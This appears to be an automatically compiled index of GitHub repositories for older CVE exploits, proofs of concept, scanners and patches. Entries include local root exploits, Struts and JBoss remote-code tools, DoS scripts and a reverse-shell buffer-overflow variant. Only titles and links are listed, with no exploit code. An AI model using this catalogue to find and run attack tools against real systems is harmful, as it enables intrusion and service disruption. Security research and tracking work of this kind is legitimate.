**Buffer overflow in the Python bindings for the xc_vcpu_setaffinity call in Xen** : [bl4ck5un/cve-2013-2072](https://api.github.com/repos/bl4ck5un/cve-2013-2072) create time: 2014-04-07T13:14:04Z

**DOS (infinite loop) attack via a small value in the IHL field of a packet with IPIP encapsulation** : [bl4ck5un/cve-2013-4348](https://api.github.com/repos/bl4ck5un/cve-2013-4348) create time: 2014-04-07T13:08:34Z

**Xen 4.2.x and 4.3.x, when using Intel VT-d for PCI passthrough, does not properly flush the TLB after clearing a present translation table entry, which allows local guest administrators to cause a denial of service or gain privileges via unspecified vectors related to an "inverted boolean parameter."** : [bl4ck5un/cve-2013-6375](https://api.github.com/repos/bl4ck5un/cve-2013-6375) create time: 2014-04-08T02:59:22Z

**CVE-2013-2597 exploit** : [fi01/libmsm_acdb_exploit](https://api.github.com/repos/fi01/libmsm_acdb_exploit) create time: 2013-06-11T05:07:05Z

**Annotated FBI exploit for the Tor Browser Bundle from mid-2013 (CVE-2013-1690)** : [vlad902/annotated-fbi-tbb-exploit](https://api.github.com/repos/vlad902/annotated-fbi-tbb-exploit) create time: 2014-08-19T03:16:49Z

**Scans NTP servers for CVE-2013-5211 NTP DDOS amplification vulnerability.** : [dani87/ntpscanner](https://api.github.com/repos/dani87/ntpscanner) create time: 2014-09-07T16:02:25Z

**Test case for Node.JS V0.10.31 v8 backport CVE-2013-6668 crash** : [sdneon/CveTest](https://api.github.com/repos/sdneon/CveTest) create time: 2014-09-10T08:27:05Z

**NTP monlist scanner CVE-2013-5211** : [suedadam/ntpscanner](https://api.github.com/repos/suedadam/ntpscanner) create time: 2014-12-14T18:58:26Z

**Shell script for testing the IPMI cipher type zero authentication bypass vulnerability (CVE-2013-4784)** : [alexoslabs/ipmitest](https://api.github.com/repos/alexoslabs/ipmitest) create time: 2013-09-27T13:04:24Z

**Spider Exploit with CVE-2013-2842** : [173210/spider](https://api.github.com/repos/173210/spider) create time: 2015-03-26T10:12:32Z

**CVE-2013-2094 kernel exploit for i386** : [timhsutw/cve-2013-2094](https://api.github.com/repos/timhsutw/cve-2013-2094) create time: 2015-03-29T12:55:03Z

**PoC Java exploit based on http://www.contextis.com/research/blog/java-pwn2own/** : [v-p-b/buherablog-cve-2013-1488](https://api.github.com/repos/v-p-b/buherablog-cve-2013-1488) create time: 2015-04-16T07:12:19Z

**A proof of concept exploit for the CVE-2013-1965 vulnerability affecting Apache Struts 2** : [cinno/CVE-2013-1965](https://api.github.com/repos/cinno/CVE-2013-1965) create time: 2015-06-04T18:47:35Z

**Exploitation Training -- CVE-2013-2028: Nginx Stack Based Buffer Overflow** : [kitctf/nginxpwn](https://api.github.com/repos/kitctf/nginxpwn) create time: 2016-03-23T10:41:00Z

**Payload generator for Java Binary Deserialization attack with Commons FileUpload (CVE-2013-2186)** : [GrrrDog/ACEDcup](https://api.github.com/repos/GrrrDog/ACEDcup) create time: 2016-02-08T08:29:11Z

**CVE-2013-6282 proof of concept for Android** : [timwr/CVE-2013-6282](https://api.github.com/repos/timwr/CVE-2013-6282) create time: 2016-12-19T16:14:18Z

**CVE-2013-1775 Exploit written in Perl** : [bekhzod0725/perl-CVE-2013-1775](https://api.github.com/repos/bekhzod0725/perl-CVE-2013-1775) create time: 2017-02-11T08:26:24Z

**Dropbear user enumeration (CVE-2013-4434) PoC** : [styx00/Dropbear_CVE-2013-4434](https://api.github.com/repos/styx00/Dropbear_CVE-2013-4434) create time: 2016-03-20T15:06:29Z

**Struts 2 DefaultActionMapper Interactive Shell Exploit for CVE-2013-225 [S2-016]** : [ninj4c0d3r/ShellEvil](https://api.github.com/repos/ninj4c0d3r/ShellEvil) create time: 2017-07-05T06:44:39Z

** Clone of suds 0.4 + suds-0.4-CVE-2013-2217.patch** : [Osirium/suds](https://api.github.com/repos/Osirium/suds) create time: 2018-02-22T15:07:09Z

**For the analysis of CVE-2013-2028** : [danghvu/nginx-1.4.0](https://api.github.com/repos/danghvu/nginx-1.4.0) create time: 2013-05-21T15:20:05Z

**CVE-2013-6117** : [milo2012/CVE-2013-6117](https://api.github.com/repos/milo2012/CVE-2013-6117) create time: 2018-07-23T14:56:03Z

**None** : [tafamace/CVE-2013-4002](https://api.github.com/repos/tafamace/CVE-2013-4002) create time: 2018-11-19T07:24:42Z

**Code generate payload for CVE-2013-2186** : [SPlayer1248/Payload_CVE_2013_2186](https://api.github.com/repos/SPlayer1248/Payload_CVE_2013_2186) create time: 2019-04-23T04:49:13Z

**Source code for CVE-2013-2186** : [SPlayer1248/CVE_2013_2186](https://api.github.com/repos/SPlayer1248/CVE_2013_2186) create time: 2019-04-23T04:56:29Z

**Arbitrary deserialization that can be used to trigger SQL injection and even Code execution** : [R3dKn33-zz/CVE-2013-0156](https://api.github.com/repos/R3dKn33-zz/CVE-2013-0156) create time: 2019-05-27T19:17:55Z

**perf_swevent_init** : [vnik5287/CVE-2013-2094](https://api.github.com/repos/vnik5287/CVE-2013-2094) create time: 2019-07-23T12:31:55Z

**this is not stable** : [tachibana51/CVE-2013-2028-x64-bypass-ssp-and-pie-PoC](https://api.github.com/repos/tachibana51/CVE-2013-2028-x64-bypass-ssp-and-pie-PoC) create time: 2019-08-03T07:38:18Z

**PoC for distributed NTP reflection DoS (CVE-2013-5211)** : [sepehrdaddev/ntpdos](https://api.github.com/repos/sepehrdaddev/ntpdos) create time: 2019-09-24T20:02:43Z

**CVE-2013-3651 PoC - EC-CUBE 2** : [motikan2010/CVE-2013-3651](https://api.github.com/repos/motikan2010/CVE-2013-3651) create time: 2019-12-26T04:43:38Z

**None** : [feliam/CVE-2013-2729](https://api.github.com/repos/feliam/CVE-2013-2729) create time: 2013-05-15T04:12:13Z

**CVE-2013-2028 python exploit** : [m4drat/CVE-2013-2028-Exploit](https://api.github.com/repos/m4drat/CVE-2013-2028-Exploit) create time: 2020-06-27T15:08:26Z

**None** : [nondejus/CVE-2013-5700](https://api.github.com/repos/nondejus/CVE-2013-5700) create time: 2020-07-17T13:50:53Z

**CVE-2013-3214** : [shadofren/CVE-2013-3214](https://api.github.com/repos/shadofren/CVE-2013-3214) create time: 2020-08-06T11:57:39Z

**None** : [cyberharsh/Nginx-CVE-2013-4547](https://api.github.com/repos/cyberharsh/Nginx-CVE-2013-4547) create time: 2020-06-20T09:37:58Z

**Automatically exploit systems with vulnerable davfs2 (CVE-2013-4362)** : [notclement/Automatic-davfs2-1.4.6-1.4.7-Local-Privilege-Escalation](https://api.github.com/repos/notclement/Automatic-davfs2-1.4.6-1.4.7-Local-Privilege-Escalation) create time: 2020-09-10T16:06:23Z

**A very simple buffer overflow using CVE-2013-4730 against PCman's FTP server** : [t0rt3ll1n0/PCmanBoF](https://api.github.com/repos/t0rt3ll1n0/PCmanBoF) create time: 2020-11-12T08:20:35Z

**IBM Lotus Notes PNG Integer Overflow** : [lagartojuancho/CVE-2013-2977](https://api.github.com/repos/lagartojuancho/CVE-2013-2977) create time: 2020-01-03T15:55:12Z

**Sketchup BMP Material RLE4 Heap Overflow** : [lagartojuancho/CVE-2013-3664_BMP](https://api.github.com/repos/lagartojuancho/CVE-2013-3664_BMP) create time: 2020-01-03T17:05:48Z

**Sketchup MAC Pict Material Palette Stack Corruption** : [lagartojuancho/CVE-2013-3664_MAC](https://api.github.com/repos/lagartojuancho/CVE-2013-3664_MAC) create time: 2020-01-03T16:53:55Z

**Dockerfile to build cve-2013-2028 container with centos6 and nginx** : [mambroziak/docker-cve-2013-2028](https://api.github.com/repos/mambroziak/docker-cve-2013-2028) create time: 2021-02-02T03:45:05Z

**Demo of Apache httpOnly Cookie Disclosure Exploit CVE2012 0053** : [jonathansp/CVE20120053Demo](https://api.github.com/repos/jonathansp/CVE20120053Demo) create time: 2012-06-22T21:13:44Z

**Mempodipper, a linux local root exploit.** : [srclib/CVE-2012-0056](https://api.github.com/repos/srclib/CVE-2012-0056) create time: 2012-12-29T15:02:02Z

**Demo app showing how the Rails CVE-2013-5664 vulnerability works.** : [phusion/rails-cve-2012-5664-test](https://api.github.com/repos/phusion/rails-cve-2012-5664-test) create time: 2013-01-03T10:07:27Z

**MySQL-Fu is a Ruby based MySQL Client Script I wrote. It does most of the stuff a normal MySQL client might do: SQL Shell, Update/Delete/Drop Database/Table, Add/Delete Users, Dump Database(s)/Table w/ option for gzip...... Plus a few extra options to make life a little easier for pentests. Includes Several builtin PHP Command Shell options as well as Pentestmonkey's PHP Reverse Shell, in addition to multiple options for file writing and reading (all files read logged locally for offline analysis later), also includes Ruby port of Kingcope's CVE-2012-5613 Linux MySQL Privilege Escalation Exploit.** : [Hood3dRob1n/MySQL-Fu.rb](https://api.github.com/repos/Hood3dRob1n/MySQL-Fu.rb) create time: 2013-02-09T04:59:43Z

**Obtain root access through CVE-2012-4220** : [hiikezoe/diaggetroot](https://api.github.com/repos/hiikezoe/diaggetroot) create time: 2013-01-07T11:45:35Z

**Discover uPNP devices vulnerable to CVE-2013-0229 / CVE-2013-0230 / CVE-2012-5958 / CVE-2012-5959** : [lochiiconnectivity/vulnupnp](https://api.github.com/repos/lochiiconnectivity/vulnupnp) create time: 2013-04-14T23:34:56Z

**This is used to scan for CVE-2012-2122 vulnerable servers.** : [Avinza/CVE-2012-2122-scanner](https://api.github.com/repos/Avinza/CVE-2012-2122-scanner) create time: 2013-05-09T17:11:20Z

**exploit for CVE-2012-4220 working on zte-open** : [poliva/root-zte-open](https://api.github.com/repos/poliva/root-zte-open) create time: 2013-07-05T12:05:33Z

**Automated exploit for CVE-2012-3153 / CVE-2012-3152** : [Mekanismen/pwnacle-fusion](https://api.github.com/repos/Mekanismen/pwnacle-fusion) create time: 2014-01-28T19:39:50Z

**Attempts to exploit CVE-2012-3137 on vulnerable Oracle servers** : [hantwister/o5logon-fetch](https://api.github.com/repos/hantwister/o5logon-fetch) create time: 2014-03-29T14:10:36Z

**Exploit for cve-2012-3137 Oracle challenge** : [r1-/cve-2012-3137](https://api.github.com/repos/r1-/cve-2012-3137) create time: 2014-06-18T16:23:52Z

**AtomicReferenceArray Hack** : [frg316/cve2012-0507](https://api.github.com/repos/frg316/cve2012-0507) create time: 2014-07-30T23:57:23Z

**use the Apple CoreText exploit (CVE-2012-3716) and launch an AP to affect all devices within wifi range** : [d4rkcat/killosx](https://api.github.com/repos/d4rkcat/killosx) create time: 2013-09-09T21:50:30Z

**CVE-2012-1876 simple calc exploitation ** : [WizardVan/CVE-2012-1876](https://api.github.com/repos/WizardVan/CVE-2012-1876) create time: 2015-05-03T18:37:15Z

**CVE-2012-4792 simple calc exploitation** : [WizardVan/CVE-2012-4792](https://api.github.com/repos/WizardVan/CVE-2012-4792) create time: 2015-05-03T18:33:28Z

**None** : [drone789/CVE-2012-1823](https://api.github.com/repos/drone789/CVE-2012-1823) create time: 2015-09-08T14:37:25Z

**linux 提权** : [pythonone/CVE-2012-0056](https://api.github.com/repos/pythonone/CVE-2012-0056) create time: 2016-07-22T13:50:40Z

**CVE-2012-0152** : [rutvijjethwa/RDP_jammer](https://api.github.com/repos/rutvijjethwa/RDP_jammer) create time: 2016-09-26T06:08:09Z

**这里保存着我学习CVE-2012-1889这个漏洞的利用所用到的文件** : [whu-enjoy/CVE-2012-1889](https://api.github.com/repos/whu-enjoy/CVE-2012-1889) create time: 2016-09-25T06:31:21Z

**None** : [k0keoyo/CVE-2012-0003_eXP](https://api.github.com/repos/k0keoyo/CVE-2012-0003_eXP) create time: 2016-12-26T13:33:22Z

**Proof of concept exploit for CVE-2012-1723** : [EthanNJC/CVE-2012-1723](https://api.github.com/repos/EthanNJC/CVE-2012-1723) create time: 2017-02-20T19:53:31Z

**An A/V evasion armoring experiment for CVE-2012-4681** : [benjholla/CVE-2012-4681-Armoring](https://api.github.com/repos/benjholla/CVE-2012-4681-Armoring) create time: 2014-09-26T02:33:24Z

**First script, pgp-cgi-cve-2012-1823 BASH script** : [gamamaru6005/oscp_scripts-1](https://api.github.com/repos/gamamaru6005/oscp_scripts-1) create time: 2017-10-01T13:47:45Z

**FreeSSHD Remote Authentication Bypass Vulnerability (freeSSHd 2.1.3)** : [bongbongco/CVE-2012-6066](https://api.github.com/repos/bongbongco/CVE-2012-6066) create time: 2017-06-30T02:15:03Z

**Oracle Database TNS Listener Poison Attack Vulnerability** : [bongbongco/CVE-2012-1675](https://api.github.com/repos/bongbongco/CVE-2012-1675) create time: 2017-10-11T23:46:24Z

**A Simple PoC for CVE-2012-4681** : [ZH3FENG/PoCs-CVE_2012_4681](https://api.github.com/repos/ZH3FENG/PoCs-CVE_2012_4681) create time: 2018-01-05T08:10:34Z

**MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) automation script.** : [w4fz5uck5/UDFPwn-CVE-2012-5613](https://api.github.com/repos/w4fz5uck5/UDFPwn-CVE-2012-5613) create time: 2018-06-14T16:58:02Z

**PHP-CGI-REMOTE_CVE-2012-1823, UnrealIRCd, MySQL, PostgreSQL and SSH bruteforce, VSFTPD2.3.4, samba CVE-2007-2447, JAVA RMI Server, distcc daemon, misconfigured NFS files, etc.** : [Unix13/metasploitable2](https://api.github.com/repos/Unix13/metasploitable2) create time: 2019-07-05T11:55:41Z

**None** : [imjdl/CVE-2012-4431](https://api.github.com/repos/imjdl/CVE-2012-4431) create time: 2019-07-03T14:13:23Z

**None** : [tafamace/CVE-2012-5575](https://api.github.com/repos/tafamace/CVE-2012-5575) create time: 2018-11-19T06:08:26Z

**CVE-2012-5106 - Freefloat FTP Server Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.** : [war4uthor/CVE-2012-5106](https://api.github.com/repos/war4uthor/CVE-2012-5106) create time: 2018-12-19T22:40:51Z

**An app demo for test android webview security issue: CVE-2012-6636** : [xckevin/AndroidWebviewInjectDemo](https://api.github.com/repos/xckevin/AndroidWebviewInjectDemo) create time: 2019-02-19T10:34:30Z

**:hocho: CRIME attack PoC : a compression oracle attacks CVE-2012-4929 :hocho:** : [mpgn/CRIME-poc](https://api.github.com/repos/mpgn/CRIME-poc) create time: 2018-04-21T09:28:31Z

**CVE-2012-5960, CVE-2012-5959 Proof of Concept** : [finn79426/CVE-2012-5960-PoC](https://api.github.com/repos/finn79426/CVE-2012-5960-PoC) create time: 2019-10-17T09:02:12Z

**None** : [l-iberty/cve-2012-1889](https://api.github.com/repos/l-iberty/cve-2012-1889) create time: 2019-11-20T13:14:45Z

**A CVE-2012-2688 shell** : [shelld3v/CVE-2012-2688](https://api.github.com/repos/shelld3v/CVE-2012-2688) create time: 2020-03-06T16:12:39Z

**None** : [cyberharsh/Oracle-mysql-CVE-2012-2122](https://api.github.com/repos/cyberharsh/Oracle-mysql-CVE-2012-2122) create time: 2020-06-24T06:26:02Z

**None** : [cyberharsh/PHP_CVE-2012-1823](https://api.github.com/repos/cyberharsh/PHP_CVE-2012-1823) create time: 2020-08-17T19:54:11Z

**Python exploit for CVE-2012-2982** : [OstojaOfficial/CVE-2012-2982](https://api.github.com/repos/OstojaOfficial/CVE-2012-2982) create time: 2020-10-25T23:37:32Z

**This was converted from a metasploit module as an exercise for OSCP studying** : [cd6629/CVE-2012-2982-Python-PoC](https://api.github.com/repos/cd6629/CVE-2012-2982-Python-PoC) create time: 2020-08-05T02:54:10Z

**A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https://github.com/hahwul/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device** : [nyc-tophile/A2SV--SSL-VUL-Scan](https://api.github.com/repos/nyc-tophile/A2SV--SSL-VUL-Scan) create time: 2021-01-01T12:26:08Z

**CVE -2012-0152** : [anmolksachan/MS12-020](https://api.github.com/repos/anmolksachan/MS12-020) create time: 2021-02-03T08:59:31Z

**PoC Python script as an exercice from tryhackme.** : [AlexJS6/CVE-2012-2982_Python](https://api.github.com/repos/AlexJS6/CVE-2012-2982_Python) create time: 2021-03-18T16:47:43Z

**Exploit for CVE-2012-2982** : [Ari-Weinberg/CVE-2012-2982](https://api.github.com/repos/Ari-Weinberg/CVE-2012-2982) create time: 2021-04-06T01:31:58Z

**CVE-2011-0228 fix for older idevices/firmwares** : [jan0/isslfix](https://api.github.com/repos/jan0/isslfix) create time: 2011-07-31T18:29:08Z

**Python Apache Killer (Range Header DoS CVE-2011-3192)** : [tkisason/KillApachePy](https://api.github.com/repos/tkisason/KillApachePy) create time: 2011-10-26T21:07:59Z

**Example of exploiting CVE-2011-3026 on Firefox (Linux/x86)** : [argp/cve-2011-3026-firefox](https://api.github.com/repos/argp/cve-2011-3026-firefox) create time: 2012-08-02T16:12:06Z

**CVE-2011-1485 - Published: 2011-04-01 - PolicyKit:** : [Pashkela/CVE-2011-1485](https://api.github.com/repos/Pashkela/CVE-2011-1485) create time: 2013-06-16T12:11:36Z

**A bash script that attempts to flood a server with TLS renegotiations by using the openssl client. See CVE-2011-1473 and CVE-2011-1473 for details.** : [c826/bash-tls-reneg-attack](https://api.github.com/repos/c826/bash-tls-reneg-attack) create time: 2018-12-27T09:08:07Z

**:unlock: CVE-2011-4919 -- mpack information disclosure demo (C)** : [hartwork/mpacktrafficripper](https://api.github.com/repos/hartwork/mpacktrafficripper) create time: 2015-02-01T00:26:07Z

**ParrotNG is a tool capable of identifying Adobe Flex applications (SWF) vulnerable to CVE-2011-2461** : [ikkisoft/ParrotNG](https://api.github.com/repos/ikkisoft/ParrotNG) create time: 2015-02-08T05:49:07Z

**Exploit of CVE-2011-1720.** : [nbeguier/postfix_exploit](https://api.github.com/repos/nbeguier/postfix_exploit) create time: 2015-03-21T08:59:08Z

**Patched version of the uploader.swf and uploaderSingle.swf to fix CVE-2011-2461** : [u-maxx/magento-swf-patched-CVE-2011-2461](https://api.github.com/repos/u-maxx/magento-swf-patched-CVE-2011-2461) create time: 2015-07-24T10:17:05Z

**Automatically exported from code.google.com/p/apache-reverse-proxy-cve20114317** : [charmstead/apache-reverse-proxy-cve20114317](https://api.github.com/repos/charmstead/apache-reverse-proxy-cve20114317) create time: 2015-12-18T08:29:10Z

**None** : [hittlle/CVE-2011-1974-PoC](https://api.github.com/repos/hittlle/CVE-2011-1974-PoC) create time: 2016-11-01T08:08:09Z

**Go Exploit for CVE-2011-4862** : [hdbreaker/GO-CVE-2011-4862](https://api.github.com/repos/hdbreaker/GO-CVE-2011-4862) create time: 2017-02-02T18:12:56Z

**CVE-2011-3368 exploit code** : [SECFORCE/CVE-2011-3368](https://api.github.com/repos/SECFORCE/CVE-2011-3368) create time: 2017-04-18T20:34:53Z

**phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion** : [SECFORCE/CVE-2011-4107](https://api.github.com/repos/SECFORCE/CVE-2011-4107) create time: 2017-04-19T14:54:13Z

**POC for exploit of CVE-2011-1237** : [BrunoPujos/CVE-2011-1237](https://api.github.com/repos/BrunoPujos/CVE-2011-1237) create time: 2017-05-19T11:04:26Z

**Apache Range Header DoS Exploit** : [limkokhole/CVE-2011-3192](https://api.github.com/repos/limkokhole/CVE-2011-3192) create time: 2018-08-02T11:30:35Z

**Very simple script to test for cve 2011-1575** : [masamoon/cve-2011-1575-poc](https://api.github.com/repos/masamoon/cve-2011-1575-poc) create time: 2017-10-17T13:05:24Z

**None** : [edmondscommerce/CVE-2011-2461_Magento_Patch](https://api.github.com/repos/edmondscommerce/CVE-2011-2461_Magento_Patch) create time: 2016-07-26T14:02:15Z

**Check with Maven on CVE-2011-1475** : [samaujs/CVE-2011-1475](https://api.github.com/repos/samaujs/CVE-2011-1475) create time: 2018-11-06T08:08:07Z

**None** : [lol-fi/cve-2011-4862](https://api.github.com/repos/lol-fi/cve-2011-4862) create time: 2018-11-28T21:13:05Z

**Python 3 implementation of an existing CVE-2011-3556 proof of concept (PoC).** : [sk4la/cve_2011_3556](https://api.github.com/repos/sk4la/cve_2011_3556) create time: 2019-01-29T20:22:09Z

**:muscle: Proof Of Concept of the BEAST attack against SSL/TLS CVE-2011-3389 :muscle:** : [mpgn/BEAST-PoC](https://api.github.com/repos/mpgn/BEAST-PoC) create time: 2015-03-28T10:28:16Z

**PoC Scan. (cve-2011-3368)** : [colorblindpentester/CVE-2011-3368](https://api.github.com/repos/colorblindpentester/CVE-2011-3368) create time: 2019-03-22T23:13:12Z

**None** : [zjt674449039/cve-2011-1473](https://api.github.com/repos/zjt674449039/cve-2011-1473) create time: 2019-05-10T02:42:13Z

**Liferay XSL - Command Execution (Metasploit)** : [noobpk/CVE-2011-1571](https://api.github.com/repos/noobpk/CVE-2011-1571) create time: 2019-06-13T07:16:38Z

**Puppet Module to help fix and migrate a Puppet deployment (CVE-2011-3872)** : [puppetlabs/puppetlabs-cve20113872](https://api.github.com/repos/puppetlabs/puppetlabs-cve20113872) create time: 2011-10-17T01:26:34Z

**Exploit PoC for Spring RCE issue (CVE-2011-2894)** : [pwntester/SpringBreaker](https://api.github.com/repos/pwntester/SpringBreaker) create time: 2013-07-31T08:48:19Z

**Final Project for Security and Privacy CS 600.443** : [kpawar2410/CVE-2011-4862](https://api.github.com/repos/kpawar2410/CVE-2011-4862) create time: 2020-02-06T09:30:45Z

**This Repository use to test Apache Killer (cve-2011-3192).** : [stcmjp/cve-2011-3192](https://api.github.com/repos/stcmjp/cve-2011-3192) create time: 2020-04-09T02:03:43Z

**Microsoft Windows - 'afd.sys' Local Kernel Privilege Escalation Exploit Report (CVE-2011-1249)** : [Madusanka99/OHTS](https://api.github.com/repos/Madusanka99/OHTS) create time: 2020-05-13T04:17:48Z

**sample exploit of buffer overflow in libpng ** : [mk219533/CVE-2010-1205](https://api.github.com/repos/mk219533/CVE-2010-1205) create time: 2010-09-14T22:16:11Z

**http://www.oracle.com/technetwork/topics/security/alert-cve-2010-4476-305811.html** : [grzegorzblaszczyk/CVE-2010-4476-check](https://api.github.com/repos/grzegorzblaszczyk/CVE-2010-4476-check) create time: 2011-02-10T10:05:56Z

**Exploit based on a faulty clone(2) implementation in Linux < 2.6.36.2 that allows overwrite of arbitrary kernel word with NULL. Research and personal-security use only. Not malicious.** : [johnreginald/CVE-2010-4258](https://api.github.com/repos/johnreginald/CVE-2010-4258) create time: 2015-02-17T01:12:55Z

**Do you own security hotfix with Deviare hooking** : [nektra/CVE-2010-3971-hotpatch](https://api.github.com/repos/nektra/CVE-2010-3971-hotpatch) create time: 2013-08-07T15:49:14Z

**Android Data Stealing Vulnerability** : [thomascannon/android-cve-2010-4804](https://api.github.com/repos/thomascannon/android-cve-2010-4804) create time: 2014-02-06T18:53:31Z

**JBoss Autopwn as featured at BlackHat Europe 2010 - this version incorporates CVE-2010-0738 the JBoss authentication bypass VERB manipulation vulnerability as discovered by Minded Security** : [ChristianPapathanasiou/jboss-autopwn](https://api.github.com/repos/ChristianPapathanasiou/jboss-autopwn) create time: 2015-01-27T13:16:45Z

**None** : [redhatkaty/-cve-2010-3904-report](https://api.github.com/repos/redhatkaty/-cve-2010-3904-report) create time: 2015-06-09T22:27:23Z

**JBoss Autopwn CVE-2010-0738 JBoss authentication bypass ** : [gitcollect/jboss-autopwn](https://api.github.com/repos/gitcollect/jboss-autopwn) create time: 2016-07-02T15:17:07Z

**None** : [whiteHat001/cve-2010-3333](https://api.github.com/repos/whiteHat001/cve-2010-3333) create time: 2016-09-26T07:35:41Z

**Script to take advantage of CVE-2010-3847** : [magisterquis/cve-2010-3847](https://api.github.com/repos/magisterquis/cve-2010-3847) create time: 2017-01-02T03:20:36Z

**CVE-2010-3332 Oracle Padding Vulnerability in Microsoft ASP.NET** : [bongbongco/MS10-070](https://api.github.com/repos/bongbongco/MS10-070) create time: 2017-10-11T23:50:33Z

**This exploit was written to study some concepts, enjoy!** : [M31MOTH/cve-2010-4221](https://api.github.com/repos/M31MOTH/cve-2010-4221) create time: 2017-10-28T20:37:26Z

**Sudo 1.6.x <= 1.6.9p21 and 1.7.x <= 1.7.2p4 Local Privilege Escalation and vulnerable container** : [t0kx/privesc-CVE-2010-0426](https://api.github.com/repos/t0kx/privesc-CVE-2010-0426) create time: 2017-12-16T01:16:44Z

**This Python 3 script is for uploading shell (and other files) to Windows Server / Linux via Oracle 11g R2 (CVE-2010-3600).** : [LAITRUNGMINHDUC/CVE-2010-3600-PythonHackOracle11gR2](https://api.github.com/repos/LAITRUNGMINHDUC/CVE-2010-3600-PythonHackOracle11gR2) create time: 2018-07-20T15:27:54Z

**None** : [quinn-samuel-perry/CVE-2010-4669](https://api.github.com/repos/quinn-samuel-perry/CVE-2010-4669) create time: 2018-10-11T07:09:49Z

**cve-2010-0426** : [cved-sources/cve-2010-0426](https://api.github.com/repos/cved-sources/cve-2010-0426) create time: 2019-01-06T17:38:19Z

**cve-2010-2075 ** : [XorgX304/UnrealIRCd-3.2.8.1-RCE](https://api.github.com/repos/XorgX304/UnrealIRCd-3.2.8.1-RCE) create time: 2020-09-18T01:07:51Z

**None** : [aforakjackson/cve2010-2333](https://api.github.com/repos/aforakjackson/cve2010-2333) create time: 2019-08-05T18:02:40Z

**None** : [huang-emily/CVE-2010-3437](https://api.github.com/repos/huang-emily/CVE-2010-3437) create time: 2019-11-19T23:35:57Z

**FreePBX exploit <= 2.8.0** : [moayadalmalat/CVE-2010-3490](https://api.github.com/repos/moayadalmalat/CVE-2010-3490) create time: 2019-12-09T15:49:21Z

**Dumb Fuzzer used to find CVE-2010-1411 ** : [MAVProxyUser/httpfuzz-robomiller](https://api.github.com/repos/MAVProxyUser/httpfuzz-robomiller) create time: 2020-01-20T03:12:03Z

**None** : [n0lann/CVE2010-3301_compiled](https://api.github.com/repos/n0lann/CVE2010-3301_compiled) create time: 2020-07-15T21:58:28Z

**Multiple untrusted search path vulnerabilities in MicroStation 7.1 allow local users to gain privileges via a Trojan horse (1) mptools.dll, (2) baseman.dll, (3) wintab32.dll, or (4) wintab.dll file in the current working directory, as demonstrated by a directory that contains a .hln or .rdl file. NOTE: some of these details are obtained from third party information.** : [otofoto/CVE-2010-5230](https://api.github.com/repos/otofoto/CVE-2010-5230) create time: 2021-03-10T16:48:53Z

**Provides a quick workaround for the segfault bug in Ruby (CVE-2009-1904)** : [NZKoz/bigdecimal-segfault-fix](https://api.github.com/repos/NZKoz/bigdecimal-segfault-fix) create time: 2009-06-08T23:21:40Z

**Simple script to exploit open redirection vulnerability in Rockwell ControlLogix 1756-ENBT/A** : [akbarq/CVE-2009-0473-check](https://api.github.com/repos/akbarq/CVE-2009-0473-check) create time: 2016-09-05T23:08:29Z

**cve-2009-3103** : [mazding/ms09050](https://api.github.com/repos/mazding/ms09050) create time: 2017-01-17T02:24:40Z

**poc for CVE-2009-5147** : [vpereira/CVE-2009-5147](https://api.github.com/repos/vpereira/CVE-2009-5147) create time: 2017-03-14T09:04:14Z

**Exploit for piwik CVE-2009-4140 RCE** : [Alexeyan/CVE-2009-4137](https://api.github.com/repos/Alexeyan/CVE-2009-4137) create time: 2017-11-28T19:31:47Z

**CVE-2009-2698 compiled for CentOS 4.8** : [xiaoxiaoleo/CVE-2009-2698](https://api.github.com/repos/xiaoxiaoleo/CVE-2009-2698) create time: 2018-02-16T16:17:24Z

**None** : [HanseSecure/CVE-2009-1437](https://api.github.com/repos/HanseSecure/CVE-2009-1437) create time: 2018-02-19T14:26:18Z

**Cisco VPN Client - Integer Overflow Denial of Service** : [alt3kx/CVE-2009-4118](https://api.github.com/repos/alt3kx/CVE-2009-4118) create time: 2018-04-02T23:19:47Z

**Linux Null pointer dereference** : [jdvalentini/CVE-2009-2692](https://api.github.com/repos/jdvalentini/CVE-2009-2692) create time: 2018-07-12T00:13:21Z

**Setup, exploit and patch for CVE-2009-4092 Simplog CSRF** : [xiaoyu-iid/Simplog-Exploit](https://api.github.com/repos/xiaoyu-iid/Simplog-Exploit) create time: 2018-11-10T20:40:32Z

**It is a version modified of the original exploit by Muhammad Haidari (https://raw.githubusercontent.com/Muhammd/HP-Power-Manager/master/hpm_exploit.py). The modification includes a payload which allows to obtain a reverse shell to avoid to open ports in the Windows'target which the firewall's windows will be closed it.** : [n4xh4ck5/CVE2009-2585_HP_Power_Manager_BoF](https://api.github.com/repos/n4xh4ck5/CVE2009-2585_HP_Power_Manager_BoF) create time: 2018-12-10T19:28:32Z

**Simple exploit for Easy RM to MP3 Converter 2.7.3.700 on Windows 7 32b.** : [adenkiewicz/CVE-2009-1330](https://api.github.com/repos/adenkiewicz/CVE-2009-1330) create time: 2018-12-30T12:17:08Z

**CVE-2009-1330 - Easy RM to MP3 Converter Local Buffer Overflow. Tested on Windows XP Professional SP3** : [war4uthor/CVE-2009-1330](https://api.github.com/repos/war4uthor/CVE-2009-1330) create time: 2019-01-05T17:32:00Z

**CVE-2009-1324 - ASX to MP3 Converter Local Buffer Overflow. Tested on Windows XP Professional SP3** : [war4uthor/CVE-2009-1324](https://api.github.com/repos/war4uthor/CVE-2009-1324) create time: 2019-01-06T12:06:15Z

**CVE-2009-4660 - BigAnt Server 2.52 'USV' Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.** : [war4uthor/CVE-2009-4660](https://api.github.com/repos/war4uthor/CVE-2009-4660) create time: 2019-01-09T23:47:50Z

